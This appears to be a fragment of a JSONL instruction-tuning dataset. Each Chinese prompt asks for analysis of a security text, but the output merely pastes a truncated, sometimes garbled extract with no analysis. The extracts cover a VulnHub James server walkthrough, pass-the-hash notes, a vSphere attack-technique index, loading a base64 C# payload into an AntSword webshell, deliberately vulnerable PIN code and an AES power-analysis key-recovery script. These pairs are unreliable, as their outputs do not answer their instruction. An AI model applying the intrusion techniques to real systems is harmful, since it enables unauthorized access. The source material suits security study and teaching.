1.1 History Expansion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 1.1.1 Event Designators . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 1.1.2 Word Designators . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 1.1.3 Modifiers. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 2 Programming with GNU History . . . . . . . . . . . . . 4 2.1 Introduction to History. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 2.2 History Storage . . . . . . . . . . . . ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEFCON 22 Joe FitzPatrick Miles Crabill Stupid PCIe Tricks featuring NSA Playset: PCIe  Electrical Engineering education with focus on CS and Infosec  8 years doing security research, speed debug, and tool development for CPUs  Hardware Pen Testing of CPUs  Security training for functional validators worldwide whoami Joe FitzPatrick @securelyfitz joefitz@securinghardware.com if Joe Fitz, he sitz  Computer Science student at Lewis & Clark College  About 2 years of experience in security research  Little to no prior hardware hacking experience  Learned this stuff as I went, with tons of help from Joe whoami Miles Crabill @milescrabill miles@milescrabill.com Miles hot tub picture was a bit too explicit This is early phase research with poor citations A lot of people have done work in this area before us The difference is that we are trying to make this type of attack inexpensive Disclaimer What is PCIe? PCIe is PCI! PCIe is NOT PCI! Foto tomada por Jorge González http://es.wikipedia.org Photo by snikerdo http://en.wikipedia.org Links and Lanes Diagram: PCIe 2.1 specification Hierarchy Diagram: PCIe 2.1 specification Switching and Routing Diagram: PCIe 2.1 specification Layers Diagram: PCIe 2.1 specification Configuration Space Diagram: PCIe 2.1 specification Configuration Space Diagram: PCIe 2.1 specification Configuration Space Diagram: PCIe 2.1 specification Configuration Space Diagram: PCIe 2.1 specification Configuration Space Diagram: PCIe 2.1 specification Enumeration Diagram: PCIe 2.1 specification Routing PCIe The Step-By-Step, Complicated, Mandatory, Inflexible Rules of Routing PCIe: 1. route pairs adjacent and equal length The Step-By-Step, Complicated, Mandatory, Inflexible Rules of Routing PCIe: 1. route pairs adjacent and equal length  thats mostly it The Step-By-Step, Complicated, Mandatory, Inflexible Rules of Routing PCIe: Routing PCIe System Board Traces 12 Inches Add-in Card Traces 3.5 inches Chip-to-Chip Routes 15 inches Follow these rules and your b", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFingerprinting and Cracking Java Obfuscated Code Yiannis Pavlosoglou A total of 36 slides Brief Outline 1. Background 2. Motivation 3. Methodology 4. Fingerprinting Tool 5. Examples 6. Conclusions 1. Background  Java Bytecode Operations  Language Security Mechanisms  Disassembling HelloWorld.java  From Bytecode to Source  What Popular Obfuscators Offer? 1.1 Java Bytecode Architecture (x86, PPC, Alpha) Java Virtual Machine Class Loader Execution Engine MyProject.jar MyProject.class Host Operating System (Windows, Linux, etc.) Native Method Calls Bytecode 1.2 Language Security Mechanisms  Type, memory and control flow checks  Instruction sets of the virtual machine [1]  Object creation  Privilege escalation [2]  Function calls  Exception handling  Verification (format, type, other violations) [3]  Security vulnerabilities lsd-pl.net [4] 1.3 HelloWorld in Bytecode HelloWorld.java HelloWorld.class HelloWorld.bc (javac) (javap) 1.4 Bytecode to Source  Java is Platform Independent Code  Simplifies reversing compared to C/C++  Popular Java Decompilers [5]  Particular obfuscators are written with the operations of java Decompilers in mind [6] 1.5 What do obfuscators offer?  Operations:  Less Human Readable Code  Remove Debug Information  Alter the Control Flow  Encrypt Constants  Restructure Simple Logic  Inject Unnecessary Code  Usability:  Used for applications that are delivered to the user  Generally, used in J2SE Applets, Installed Applications, etc.  Generally, not used in Java Enterprise Environments 2. Motivation  Basic Obfuscation Techniques  Reverse Engineering Particulars  Who is Using Obfuscators? 2.1 Basic Obfuscation Techniques  Renaming of objects and methods  a.class, b.class, a.c(5), etc.  Extending classes  public class a extends d {  Removing line numbers  Encoding String Values  Variable Splitting Techniques  boolean z becomes int x=1; if (x < 0) Obfuscation is possible for the same reasons that decompiling is possible [7] 2.2 Reverse Engineering Particu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# SolidState 下载地址https://download.vulnhub.com/solidstate/SolidState.zip ## 实战演练 找到靶场IP地址`192.168.32.156` ![image-20220612194228691](../../.gitbook/assets/image-20220612194228691.png) 扫描对外端口 ``` (rootkali)-[/tmp] # nmap -sT -sV -p1-65535 192.168.32.156 Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-12 07:41 EDT Nmap scan report for 192.168.32.156 Host is up (0.00013s latency). Not shown: 65529 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) 25/tcp open smtp JAMES smtpd 2.3.2 80/tcp open http Apache httpd 2.4.25 ((Debian)) 110/tcp open pop3 JAMES pop3d 2.3.2 119/tcp open nntp JAMES nntpd (posting ok) 4555/tcp open james-admin JAMES Remote Admin 2.3.2 MAC Address: 00:0C:29:FA:6B:D9 (VMware) Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.60 seconds ``` 浏览器访问80端口 ![image-20220612194414845](../../.gitbook/assets/image-20220612194414845.png) 扫描80端口的目录没有发现什么可用信息 ![image-20220617142619876](../../.gitbook/assets/image-20220617142619876.png) 搜索James服务可利用脚本 ``` (rootkali)-[~/Desktop] # searchsploit james ----------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ----------------------------------------------------------------------------------- --------------------------------- Apache James Server 2.2 - SMTP Denial of Service | multiple/dos/27915.pl Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploi | linux/remote/48130.rb Apache James Server 2.3.2 - Remote Command Execution | linux/remote/35513.py Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2) | linux/remote/50347.py WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow | windows/remote/944.c -----------------------------------", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport r2pipe, sys r2=r2pipe.open(\"iof.elf\") s=r2.cmd(\"p8 4 @ \"+sys.argv[1]) s=s[6:8]+s[4:6]+s[2:4]+s[0:2] print s print r2.cmd(\"xr 4 @ \"+sys.argv[1]+\"\") r=open(\"esp32.rom\").readlines() for l in r: if s in l: print l", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nxargs === 给其他命令传递参数的一个过滤器 ## 补充说明 **xargs 命令** 是给其他命令传递参数的一个过滤器也是组合多个命令的一个工具它擅长将标准输入数据转换成命令行参数xargs 能够处理管道或者 stdin 并将其转换成特定命令的命令参数xargs 也可以将单行或多行文本输入转换为其他格式例如多行变单行单行变多行xargs 的默认命令是 echo空格是默认定界符这意味着通过管道传递给 xargs 的输入将会包含换行和空白不过通过 xargs 的处理换行和空白将被空格取代xargs 是构建单行命令的重要组件之一 ### xargs 命令用法 xargs 用作替换工具读取输入数据重新格式化后输出 定义一个测试文件内有多行文本数据 ```shell cat test.txt a b c d e f g h i j k l m n o p q r s t u v w x y z ``` 多行输入单行输出 ```shell cat test.txt | xargs a b c d e f g h i j k l m n o p q r s t u v w x y z ``` #### 使用 -n 进行多行输出 **-n 选项** 多行输出 ```shell cat test.txt | xargs -n3 a b c d e f g h i j k l m n o p q r s t u v w x y z ``` #### 使用 -d 分割输入 **-d 选项** 可以自定义一个定界符 ```shell echo \"nameXnameXnameXname\" | xargs -dX name name name name ``` 结合 **-n 选项** 使用 ```shell echo \"nameXnameXnameXname\" | xargs -dX -n2 name name name name ``` #### 读取 stdin **读取 stdin将格式化后的参数传递给命令** 假设一个命令为 sk.sh 和一个保存参数的文件 arg.txt ```shell #!/bin/bash #sk.sh 命令内容打印出所有参数 echo $* ``` arg.txt 文件内容 ```shell cat arg.txt aaa bbb ccc ``` #### 结合 -I 选项 xargs 的一个 **选项 -I** 使用 -I 指定一个替换字符串{}这个字符串在 xargs 扩展时会被替换掉当 -I 与 xargs 结合使用每一个参数命令都会被执行一次 ```shell cat arg.txt | xargs -I {} ./sk.sh -p {} -l -p aaa -l -p bbb -l -p ccc -l ``` 复制所有图片文件到 /data/images 目录下 ```shell ls *.jpg | xargs -n1 -I{} cp {} /data/images ``` #### 结合 find 命令使用 **xargs 结合 find 使用** 用 rm 删除太多的文件时候可能得到一个错误信息`/bin/rm Argument list too long`. 用 `xargs` 去避免这个问题 ```shell find . -type f -name \"*.log\" -print0 | xargs -0 rm -f ``` xargs -0 将 `\\0` 作为定界符 统计一个源代码目录中所有 php 文件的行数 ```shell find . -type f -name \"*.php\" -print0 | xargs -0 wc -l ``` 查找所有的 jpg 文件并且压缩它们 ```shell find . -type f -name \"*.jpg\" -print | xargs tar -czvf images.tar.gz ``` #### 打印出执行的命令 结合 `-t` 选项可以打印出 `xargs` 执行的命令 ls | xargs -t -I{} echo {} 会输出当前目录下的文件列表和执行的 echo 命令 #### 使用 -p 选项确认执行的命令 `-p` 选项会在执行每一个命令时弹出确认当你需要非常准确的确认每一次操作时可以使用 `-p` 参数比如查找当前目录下 `.log` 文件每一次删除都需要确认 find . -maxdepth 1 -name \"*.log\" | xargs -p -I{} rm {} #### 执行多个命令 使用 `-I` 选项可以让 `xargs` 执行多个命令 cat foo.txt one two three cat foo.txt", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Pass the hash Windows域渗透的首要目标是获取一个用户权限或一个shell会话 NTLM hashes**可以**用来进行Pass-The-Hash攻击 Net-NTLM hashes**不可以**用来进行Pass-The-Hash攻击 可以使用metasploit的PSExec的模块来获取哈希值 若果你想批量获取多台设备的哈希那Metasploit的么smb_login模块就适合你但是如果使用域控进行尝试假设它们有一个锁定策略就有可能导致帐户被锁定在域之外 Empire还在`credentials/mimikatz/pth`模块中执行pass-the-hash的提供了相关可选项https://www.powershellempire.com/?page_id=270 ###Ranger Ranger是一个很奈斯的工具它可以以多种方式与Windows系统交互 https://github.com/funkandwagnalls/ranger Rangers这个工具使用命令行进行操作它能够使用实例化的catapult服务器提供针对Windows系统的功能只要用户具有一组凭证或哈希散列集(NTLM, LM, LM:NTLM)他或她就可以访问信任之外的系统", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nITDR 介绍 A ITDR 之 vSphere B ITDR 之 vSphere 赛博昆仑 昆仑实验室负责人-古河 Yuki Chen vSphere 作为基础计算平台在如今企业环境中被广泛应用 , 同时对其的攻击和漏洞挖掘一直是非常热门的话 题 , 本书深入浅出地讲解了 vCenter 的攻防两面 , 对企业进行 vSphere 安全建设起到了重要的参考和指导意义 奇安信 观星实验室负责人-龚玉山ISWIN vCenter 作为 vSphere 的核心控制节点一直是攻击者的首选目标本书总结了针对 vCenter 各个阶段的 攻击手法和实际案例以及对应的检测和加固方案方便企业安全管理者快速了解 vSphere 攻击流程以及针对性 的防御方法 深信服 深蓝实验室负责人-潘立亚sm0nk 集权类产品是攻防实战的兵家必争之地拿到集权类产品权限相当于站到了攻击的制高点vSphere 作为 重要的集权产品同时又是云化虚拟化的的关键套件倍受广大红队攻击手和漏洞挖掘者的关注和热爱本书对 vSphere 产品体系风险攻击面攻击技战法信息收集权限获取权限维持防御绕过虚拟机权限获取 虚拟机逃逸安全加固 等维度 做出了攻击与防御的方法总结无论是实战攻击手还是企业安全建设者均有重 要的参考和指导意义 360 灵腾实验室负责人-赖志活 wfox vSphere 在攻防领域有小域控之称vSphere 被攻破之后不单单只是获取一台服务器的权限其管理的多 台服务器都将沦陷在攻防活动领域越来越多的攻击者把矛头放在攻击 vSphere 服务上本书能够深入浅出地 讲解 vSphere 的风险威胁场景实战攻击技战法以及如何应对加固防御帮助读者更好地了解 vSphere 攻防技 术体系 360安全专家-Ricter Z 本白皮书对于 vCenter 的各类研究都非常透彻涉及 vCenter 相关的整体架构攻防对抗漏洞利用后渗 透利用防御加固等方面覆盖了完整的利用生命周期对于想针对 vCenter 进行漏洞挖掘研究的攻击方和想针 对 vCenter 进行加固的防御方都有极大的帮助和指导vCenter 架构复杂攻击面极多想要完整研究需要深入 了解各个组件和功能本书对于主要功能都有详细的研究无疑是一个极佳的研究入手参考 中安网星御守实验室 vSphere 是企业身份认证和集中计算的一个重要基础设施同时也是攻防对抗中的一个火力焦点是 ITDR 体系中绕不开的一环在对其进行保护的研究的过程中我们深入分析了 vSphere 体系中的各个组件梳理出了 其复杂的攻击面输出了一份 vSphere 攻防技术白皮书其中涉及 vSphere 的体系介绍安全风险攻击手法 防御方案等希望能对 vSphere 的研究起到一定的帮助作用 ITDR 介绍 C 目录 1. ITDR介绍 1 2. vSphere体系介绍 2 2.1 ESXI 3 2.2 vCenter Server 4 2.3 管理客户端 5 2.4 存储网络和阵列 6 2.5 应用场景 6 2.6 小结 8 3. vSphere风险介绍 10 3.1 攻防场景下的vSphere 11 3.2 vSphere勒索分析 11 3.2.1 Babuk 12 3.2.2 Luna 12 3.2.3 REvil 13 4. vSphere攻击技战法 14 4.1 vSphere攻击场景介绍 15 4.2 vSphere攻击手法一览 16 4.3 信息探测 16 4.3.1 SOAP版本探测 16 4.3.2 密码爆破 18 4.3.3 密码喷洒 20 4.3.4 PSQL敏感信息查询 20 4.3.5 LDAP敏感信息查询 24 4.3.6 vCenter备份文件泄露 27 4.3.7 EAM用户服务文件读取 28 4.3.8 vCenter服务扫描 29 4.4 权限获取 31 4.4.1 CVE-2021-21985 31 4.4.2 CVE-2021-22005 33 4.4.3 log4j2 JNDI注入 35 4.4.4 利用Automation API操作虚拟机 40 4.4.5 利用Web Services API操作虚拟机 44 4.4.6 利用PowerCLI操作虚拟机 45 4.4.7 利用SSH登陆ESXI 48 4.4.8 CVE-2021-21972 50 4.4.9 Provider-SSRF 51 目录 CONTENTS ITDR 之 vSphere D ITDR 之 vSphere 4.4.10 Struts2-045 53 4.4.11 标识源凭据窃取 56 4.4.12 SAML证书认证 57 4.5 权限维持 59 4.5.1 LDAP新增账户 59 4.5.2 强制重置用户密码 61 4.5.3 高权限", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n(((uuunnn))) SSSm m maaassshhhiiinnnggg ttthhheee SSStttaaaccckkk::: 22288 77755 666ee 22299 55533 666dd 66611 7733 66688 66699 66ee 66677 22200 55544 6688 6655 2200 55533 77744 66611 66633 666bb 333aa 8 5 e 9 3 d 1 73 8 9 6e 7 0 4 68 65 20 3 4 1 3 b a fff o ttt fff 6 65 72 66 c fff 77 3 c 0 3 5 e 4 5 2 d 5 1 3 1 e 4 8 5 0 2 5 1 c 0 7 fff 72 6c 4 O OOvvveeerrr llloow w wsss,,, CCCooouuunnn eeerrrm m meeeaaasssuuurrreeesss,,, 444 77766 6655 7722 6666 666cc 666 7777 77733 222cc 22200 44433 666fff 77755 666ee 77744 66655 77722 666dd 66655 66611 77733 777555 777222 666555 777333 222ccc aaannnddd ttthhheee RRReeeaaalll W W Wooorrrlllddd 66611 666ee 666444 222000 77744 66688 66655 22200 55522 66655 66611 666cc 22200 55577 666 7722 66cc 66644 Shawn Moyer Chief Researcher, SpearTip Technologies http://www.speartip.net { b l a c k h a t } [ at ] { c i p h e r p u n x } [ dot ] { o r g } 0x00: Intro :: Taking the blue pill (at first). My first exposure to buffer overflows, like much of my introduction to the security field, was while working for a small ISP and consulting shop in the 90s. Dave, who was building a security practice, took me under his wing. I was a budding Linux geek, and I confessed an affinity for Bash. After a brief lecture about the finer points of tcsh, Dave borrowed my laptop running Slackware, and showed me the Bash overflow in PS1, found by Razvan Dragomirescu. This was a useful demonstration in that a simple environment variable would work to overwrite a pointer, though I immediately asked the importunate question of what good it did anyone to get a command shell to crash and then, well, run a command, in the context of the same user. I supposed if I ever encountered a restricted Bash shell somewhere, I was now armed to the teeth. Just the same, I wanted to understand: how did those bits of shellcode get where they shouldnt be, and get that nasty /bin/ls payload to run? Not too long after Daves demonstration, I spent a lot of time puzzling over Aleph O", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGotta glitch em all! 10+ Years of War Stories Glitching Embedded Devices AGENDA Introduction FI in the wild Practical FI Protections Where is the problem? const char *PIN = \"19379148\" // Compare the PIN with the correct one // Return true if different bool comparePIN(char *pin) { for (int i=0; i<strlen(pin); i++) { if (pin[i]!=PIN[i]) return true; } return false; } const char *PIN = \"19379148\" // Compare the PIN with the correct one // Return true if different bool comparePIN(char *pin) { for (int i=0; i<strlen(pin); i++) { if (pin[i]!=PIN[i]) return true; } return false; } // Authenticate PIN. // Return true if incorrect bool pinAuthentication() { char pin[80]; char tmp[80]; bool result=false; printf(\"Please, introduce PIN\\r\\n\"); gets(pin); result = comparePIN(pin); if (result == false) { sprintf(tmp,\"PIN correct\\r\\n\"); } else { sprintf(tmp,\"PIN %s is incorrect\\r\\ n\",pin); } printf(tmp); return result; } // Authenticate PIN. // Return true if incorrect bool pinAuthentication() { char pin[80]; char tmp[80]; bool result=false; printf(\"Please, introduce PIN\\r\\n\"); gets(pin); result = comparePIN(pin); if (result == false) { sprintf(tmp,\"PIN correct\\r\\n\"); } else { sprintf(tmp,\"PIN %s is incorrect\\r\\ n\",pin); } printf(tmp); return result; } Where is the problem? const char *PIN = \"19379148\" // Compare the PIN with the correct one // Return true if different bool comparePIN(char *pin) { for (int i=0; i<strlen(pin); i++) { if (pin[i]!=PIN[i]) return true; } return false; } const char *PIN = \"19379148\" // Compare the PIN with the correct one // Return true if different bool comparePIN(char *pin) { for (int i=0; i<strlen(pin); i++) { if (pin[i]!=PIN[i]) return true; } return false; } // Authenticate PIN. // Return true if incorrect bool pinAuthentication() { char pin[80]; char tmp[80]; bool result=false; printf(\"Please, introduce PIN\\r\\n\"); gets(pin); result = comparePIN(pin); if (result == false) { sprintf(tmp,\"PIN correct\\r\\n\"); } else { sprintf(tmp,\"PIN %s is incorrect\\r", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Jscript加载Assembly踩坑记 前 理论持 Assembly 从Jscript到C# 踩坑过程 问题解决 最后 @yzddmr6 最近想要给As-Exploits增加aspx类型的持就研究了下冰蝎跟哥斯拉的实现 由于冰蝎跟哥斯拉都采的C#类型的shell所以可以直接调系统的些api并且可以加载任意的 shellcode蚁剑采的是传统的Jscript就想找个办法把它们两者结合起来Jscript加载C#的 assembly以此来达到兼容原有shell类型的的 但是在实现的过程中踩了些坑所以就写下这篇章记录下 这要先提到个概念叫Assembly引下rebeyond师傅章中的话 https://xz.aliyun.com/t/2758 java跟.net有很多相似之处这我们可以简单的理解为.net中的assembly就像java中的classjava中 使defineClass来加载个类到jvm内存中同样.net中可以使Assembly.Load来把assembly加载 到内存中 蚁剑的是Jscript然冰蝎哥斯拉的C#那么能否Jscript去调C#呢 答案是可以的这附张.net framework的框架图 前 理论持 Assembly 在Java中每个类经过编译之后都单独对应个class件在.net中则不同.net中不存在单个类对 应的进制件是引了个叫做Assembly程序集的概念已编译的类是以Assembly的形式 来承载的Assembly是供CLR执的可执件在.NET下托管的DLL和EXE都称之为Assembly 个Assembly可以包含多个类 从Jscript到C# 2 可以看到最顶层的如C#,VB,Jscript等语他们的底层框架都是通的都是在.net framework这个体 系内所以C#编译成的assembly在Jscript中是可以通的 3 那么Jscript如何将其加载进去呢由于其中部分基类库Base Class Library(BCL)是共有的 Assembly.Load刚好在System.Reflection这个命名空间下所以我们就可以在Jscript中调 System.Reflection.Assembly.Load来把C#的assembly加载到内存中 这可能会有同学问了既然Jscript也是独的语理论上C#能实现的他都能实现为什么还要 费周折再去加载C#呢 其实也不是没有想过直接Jscript写但是在实现的过程中发现太蛋疼了Jscript基本搜不到什么 档报错也搜不到本测试过VSVS coderider都没有Jscript的补全跟亮开发起来常难 受另外个原因是很多开源具都的C#实现采assembly加载的式稍微修改下就可以快速复  前扯了这么多主要是理论当然实现中没有这么顺利 先新建个Class Library项这以弹计算器为例 项动编译或者动编译为dll base64下 踩坑过程 1 using System.Diagnostics; 2 3 namespace AntPayload 4 { 5 public class Run 6 { 7 public override bool Equals(object obj) 8 { 9 Process.Start(\"calc.exe\"); 10 return true; 11 } 12 } 13 } 1 csc /t:library AntPayload.cs 1 base64 -w 0 AntPayload.dll > AntPayload.txt 4 Payload 1 TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBi ZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAEXJD2AAAAAAAAAAAO AAIiALATAAAAgAAAAGAAAAAAAANicAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAA AAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAA AAAAAAAAAAAOQmAABPAAAAAEAAAIgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAACs JQAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIA AACAAAAAAAAAAAAAAACCAAAEg", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: RDS 信息收集 --- <center><h1>RDS 信息收集</h1></center> --- ## 通知邮箱 在 AWS RDS 的控制台处可以在编辑警报处看到目标配置的通知邮箱地址这种邮箱地址可能是目标公司的安全部门人员邮箱应该予以关注 </br><img width=\"800\" src=\"/img/1651979355.png\"></br> ## 性能详情 在 AWS RDS 控制台中可以通过数据库性能详情信息收集到目标 RDS TOP SQL 语句TOP 连接主机TOP 用户等信息 </br><img width=\"800\" src=\"/img/1651979406.png\"></br> ## 共享快照 对于 AWS RDS可以在共享快照中根据快照名称判断查找看看是否有和目标相关联的快照然后再通过还原快照的方式获得快照中 RDS 的数据 </br><img width=\"1000\" src=\"/img/1651979469.png\"></br> <Vssue /> <script> export default { mounted () { this.$page.lastUpdated = \"2022年5月8日\" } } </script>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAthena A users guide By Steve Lord (A friend of Daves) steve@buyukada.co.uk You are no longer a child: you must put childish thoughts away.\" [Athena to Telemachus. Homer, Odyssey 1.296] Background Athena was the Greek goddess of wisdom, war, the arts, industry, justice and skill. She was the strongest supporter of Odysseus, and regularly helped both him and his son Telemachus throughout the Odyssey. Athena is also the name of a mighty fine Turkish band, but thats not important right now. Id been working on a poorly written search engine query tool for a while when I heard about Foundstones SiteDigger. I decided to expand it into something better, using a modified (yet semi- compatible) form of the SiteDigger XML file format. Requirements Athena should work on any system with the .NET CLR runtime installed. So far its been tested on various Windows XP systems with .NET but 2000 should be fine. If anyone gets this working on Mono then Id be very interested in hearing about it. Further Information The latest release of Athena is available from the Athena homepage an http://www.buyukada.co.uk/projects/athena/ - There is also an Athena mailing list accessible from the main Athena site. Credit Where Credits Due Athena couldnt have been written without the help of a number of people. Firstly, the guys at Foundstone whos excellent SiteDigger almost met my requirements and motivated me to write Athena, jonny.ihackstuff.com for the inspiration, same goes for the Fravia guys at searchlore.org. Thanks also go to Muaddib and Jamaica Dave for being great beta testers and of course to my wife Ozge, whos put up with my blobbing as I completely fail to juggle this, home and work. Polite Notice Athena could be misused to do some really bad things. Please dont. Every time you exploit something through Athena, you give me less of an incentive to publicly release updates. If I get enough complaints from search engine owners, Ill take it offline. Getting Started Installing Athena is easy", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCyberterrorism & the Security of the National Drinking Water Infrastructure John McNabb johnmcnabb@comcast.net DEF CON 18 July 31, 2010 1 Introduction  IT Pro, 5 years; have a few certs.  Water Commissioner, 13 years, 1997-2010  Mass. DEP 6 years, 1983-1986, Legislative Liaison  Clean Water Action, 10 years, 1999 - 2009 Speaker: The Next HOPE- Electronic Take Back, Phreaknic 14 Environmental Impacts of the IT Industry Speaker:  NEWWA Conferences, 2007 - 2009  AWWA, National Water Security Congress, 2009 Publication: June, 2010 NEWWA Journal Objective of this talk: To make a realistic assessment of the potential of a terrorist attack, cyber or kinetic, against US public water systems. NOTE: Nothing will be presented here to assist anyone seeking to attack drinking water systems. Only information from open sources will be presented. The objective of this presentation is to improve the protection of public water systems from attack. DISCLAIMER: the views expressed are my own, not of any organization of which I am a member What the #@#!! is a Water Commissioner?  Its a New England thing  Elected position, usually 3 Commissioners, 3 year term  In most other places the Water Dept. is part of the DPW, run by an appointed Superintendent  Policy-making, managerial, not day to day  Budget, rate increases, etc. 3 Outline  Definitions  Threats to Drinking Water  National Water Infrastructure Issues  Components of a Single Water System  SCADA Security Issues  Public water vulnera- bilities & programs  Conclusions 4 Definitions  Public Water System  SCADA: Supervisory Control And Data Acquisition;  Process Control Systems,  Distributed Control Systems  Critical Infrastructure [drinking water is a critical infrastructure]  Cyberterrorism 5 How Important is Drinking Water?  Water is essential for public health  Infrastructures that are dependent on drinking water: Agriculture Food Public Health Emergency Services Government National Defense Industrial Information & Telecommunicatio", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport numpy as np sbox = [ 0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76, 0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0, 0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15, 0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75, 0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84, 0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF, 0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8, 0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2, 0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73, 0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB, 0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79, 0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08, 0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A, 0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E, 0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF, 0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16 ] hamm = [bin(i).count('1') for i in range(256)] def hypothesis(inputs, outputs, traces, byte_num, byte_check): best_corr = 0 x = np.zeros(len(traces)) for i in range(len(traces)): x[i] = hamm[sbox[inputs[i][byte_num]  byte_check]] traces1 = traces.T for trace_pos in range(len(traces[0])): y = traces1[trace_pos] r = abs(np.corrcoef(x, y)[0][1]) if r > best_corr: best_corr = r best_t = trace_pos return best_corr, best_t def find_byte(", "category": "text_analysis", "source": "security_papers"}
